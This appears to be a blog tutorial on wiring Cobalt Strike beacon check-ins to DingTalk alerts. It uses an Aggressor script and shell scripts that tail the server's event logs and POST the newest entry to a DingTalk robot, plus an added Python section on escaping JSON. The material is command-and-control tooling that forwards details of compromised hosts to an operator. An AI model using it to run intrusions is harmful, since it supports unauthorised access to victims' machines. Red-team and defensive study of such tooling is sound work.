Sending a DingTalk notification when a CobaltStrike beacon checks in

白色键盘

Everything I found online only covers WeChat and Telegram notifications, so I made a small change to an Aggressor script to send a DingTalk notification instead.

# Fires when a new beacon checks in for the first time
on beacon_initial {
    # Helper kept from the original script; it is defined here but not used below
    sub http_get {
        local('$output');
        $url = [new java.net.URL: $1];
        $stream = [$url openStream];
        $handle = [SleepUtils getIOHandle: $stream, $null];

        @content = readAll($handle);

        foreach $line (@content) {
            $output .= $line . "\r\n";
        }

        println($output);
    }

    local('$token $json');
    $token = "xxxxxxxxxxxxxxxxxxxx";   # placeholder: the robot's access_token
    # Sleep single-quoted strings are literal, so the JSON body can contain double quotes as-is
    $json = '{"msgtype": "text", "text": {"content": "CobaltStrikeonline+1"}, "at": {"isAtAll": true}}';
    # Hand curl an argument array instead of one command string, so no shell quoting is involved
    exec(@("curl", "-X", "POST",
           "https://oapi.dingtalk.com/robot/send?access_token=" . $token,
           "-H", "Content-Type: application/json",
           "-d", $json));
}

Test screenshot (image not included): the notification as shown on the phone.

PS: Because the DingTalk robot only accepts POSTed JSON, escaping the quotes caused all kinds of problems and curl syntax errors, so the beacon_info output cannot be placed directly in the message; I hope someone more experienced can improve this.
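The escaping problem described above is the classic failure of assembling JSON by string concatenation: any quote, backslash or newline in the log line either breaks the request or changes its structure, and the reliable fix is to let a JSON encoder produce the body. The following Python script is an added example written for this edit, not code from the original post: it builds the same DingTalk text message (the msgtype, text.content and at.isAtAll fields used on the page) from a constructed sample log line, shows that the concatenated version fails to parse while the encoded one round-trips intact, and includes a small POST helper that reads the robot token from a hypothetical DINGTALK_TOKEN environment variable (the token itself is not on the page).

```python
import json
import os
import urllib.request

# Constructed sample log line, shaped like the text the author pipes into the message body.
# It deliberately contains double quotes, backslashes and a newline: the characters that
# break a hand-built JSON string.
SAMPLE_LINE = (
    '07/04 12:00:01 initial beacon from user@HOST "WORKSTATION" '
    '(C:\\Users\\user)\nsecond line of the same record'
)


def naive_payload(line: str) -> str:
    """The string-concatenation approach used by the shell scripts on the page.

    Correct only while `line` contains no quotes, backslashes or control characters.
    """
    return '{"msgtype":"text","text":{"content": "' + line + '"},"at": {"isAtAll": true}}'


def build_payload(line: str, at_all: bool = True) -> str:
    """Encode the same message with a real JSON serializer; every special character is escaped."""
    message = {
        "msgtype": "text",
        "text": {"content": line},
        "at": {"isAtAll": at_all},
    }
    return json.dumps(message, ensure_ascii=False)


def is_valid_json(text: str) -> bool:
    """True if `text` parses as JSON (what the DingTalk endpoint requires of the body)."""
    try:
        json.loads(text)
        return True
    except json.JSONDecodeError:
        return False


def decoded_content(payload: str) -> str:
    """Parse a payload and return the text.content field, to check that the line round-trips."""
    return json.loads(payload)["text"]["content"]


def post_payload(webhook_url: str, payload: str) -> int:
    """POST the encoded payload and return the HTTP status. Not exercised by the checks below."""
    req = urllib.request.Request(
        webhook_url,
        data=payload.encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


if __name__ == "__main__":
    print("naive payload parses:  ", is_valid_json(naive_payload(SAMPLE_LINE)))   # False
    print("encoded payload parses:", is_valid_json(build_payload(SAMPLE_LINE)))   # True
    # Hypothetical environment variable; the real access_token is not part of the page.
    token = os.environ.get("DINGTALK_TOKEN")
    if token:
        url = "https://oapi.dingtalk.com/robot/send?access_token=" + token
        print("status:", post_payload(url, build_payload(SAMPLE_LINE)))
```

The same rule carries over to the shell versions: rather than echoing `\"content\": \"$line\"` into a file, feed the line to an encoder (for instance `jq -n --arg c "$line" '{msgtype:"text",text:{content:$c},at:{isAtAll:true}}'`) so the log text is treated as data, never as part of the JSON syntax.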

DingTalk API documentation: https://ding-doc.dingtalk.com/doc#/serverapi2/qf2nxq

Update, 4 July

Shell script that reads the CobaltStrike log to send the DingTalk check-in notification

Use tail to read the log file contents and write them into a JSON file in a loop:

#!/bin/bash
FILE="events.log"   # file the JSON body is written to
while true
do
    # take the last line of every events.log under the CS log directory, keep the lines
    # containing '07' (July) and use the most recent one
    tail -n1 /root/cobaltstrike/logs/*/events.log | grep '07' | tail -1 > test.txt
    # read test.txt line by line, assigning each line to $line
    cat test.txt | while read -r line
    do
        echo -e "{" > "$FILE"
        echo -e "\"msgtype\":\"text\",\"text\":{\"content\": \"$line\"},\"at\": {\"isAtAll\": true}" >> "$FILE"   # write the JSON to send
        echo -e "}" >> "$FILE"
    done
    sleep 1   # added: pause between polls instead of spinning the CPU
done

Use inotifywait to watch the log directory for changes and trigger the curl request

inotifywait must be installed first: yum install inotify-tools -y or apt-get install inotify-tools -y

#!/bin/bash
# watch /root/cobaltstrike/logs recursively; each event prints "<date>,<path>,<event>" into $FL
inotifywait -mrq --timefmt '%Y%m%d' --format '%T,%w%f,%e' -e modify,delete,create,attrib /root/cobaltstrike/logs | while read -r FL
do
    # on every change, POST the JSON body written by the previous script to the DingTalk robot
    printf '%s\n' "$FL"
    curl -X POST "https://oapi.dingtalk.com/robot/send?access_token=xxxxxxxxxxx" -H "Content-Type: application/json" -d @/root/cobaltstrike/events.log
    echo "_"
done

Result (screenshots not included).
